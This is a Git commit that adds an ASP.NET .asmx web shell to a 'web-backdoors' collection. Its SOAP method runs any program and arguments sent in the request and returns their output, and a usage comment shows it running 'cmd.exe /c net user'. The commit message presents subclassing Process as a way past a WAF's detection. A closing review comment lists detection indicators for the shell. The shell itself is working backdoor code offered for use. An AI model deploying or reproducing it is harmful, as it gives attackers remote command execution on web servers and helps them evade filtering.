
Commit 986ed12

author
Rvn0xsy
authored
Add files in asmx format
This script can bypass the WAF that detects Process()
1 parent c18605c commit 986ed12


1 file changed

+88
-0
lines changed


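--- a/web-backdoors/asp/cmd.asmx
+++ b/web-backdoors/asp/cmd.asmx
@@ -0,0 +1,88 @@
+<%--
+
+Usage:
+
+POST /test.asmx HTTP/1.1
+Host: example.com
+Content-Type: text/xml; charset=utf-8
+Content-Length: 363
+SOAPAction: "http://tempuri.org/Test"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<Test xmlns="http://tempuri.org/">
+<Z1>cmd.exe</Z1>
+<Z2>/c net user</Z2>
+</Test>
+</soap:Body>
+</soap:Envelope>
+
+--%>
+
+<%@ WebService Language="C#" Class="Service" %>
+using System;
+using System.Web;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Data;
+using System.Data.SqlClient;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Web.SessionState;
+using System.Web.Services;
+using System.Xml;
+using System.Web.Services.Protocols;
+
+[WebService(Namespace = "http://www.payloads.online/")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+
+public class New_Process :Process
+{
+public New_Process(string s)
+{
+
+}
+
+}
+
+
+public class Service : System.Web.Services.WebService
+{
+public Service()
+{
+
+}
+
+[WebMethod]
+public string Test(string Z1,string Z2)
+{
+String R;
+
+ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
+Process e = new New_Process("something");
+StreamReader OT, ER;
+c.UseShellExecute = false;
+c.RedirectStandardOutput = true;
+c.RedirectStandardError = true;
+e.StartInfo = c;
+
+e.Start();
+OT = e.StandardOutput;
+ER = e.StandardError;
+e.Close();
+R = OT.ReadToEnd() + ER.ReadToEnd();
+HttpContext.Current.Response.Clear();
+HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
+HttpContext.Current.Response.Write("<data>");
+HttpContext.Current.Response.Write("<![CDATA[");
+HttpContext.Current.Response.Write("\x2D\x3E\x7C");
+HttpContext.Current.Response.Write(R);
+HttpContext.Current.Response.Write("\x7C\x3C\x2D");
+HttpContext.Current.Response.Write("]]>");
+HttpContext.Current.Response.Write("</data>");
+HttpContext.Current.Response.End();
+return R;
+}
+}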
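Review bot: The `<%-- --%>` header documents only how to call `Test`, not what the file exposes or how it appears in telemetry, which is what someone auditing a web root or writing a signature needs from this listing. `Test` passes the SOAP fields `Z1` and `Z2` unchanged to `ProcessStartInfo` and writes the child's stdout and stderr back between the fixed markers `->|` and `|<-`, so deriving `New_Process` from `Process` only avoids a match on the literal `new Process(`; the `System.Diagnostics` import, `ProcessStartInfo`, the `.Start()` call and the child process spawned by the ASP.NET worker all remain observable. I would add a line to the header comment such as `Indicators: .asmx with a [WebMethod] that builds ProcessStartInfo from request fields; web worker spawning a child process; response body framed by "->|" and "|<-"`. The `[WebService]` and `[WebServiceBinding]` attributes sit above `New_Process` rather than `Service`, which is presumably why the usage sample addresses the default `http://tempuri.org/` namespace instead of the declared one; a comment saying so would spare a reader the confusion when matching on `SOAPAction`.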
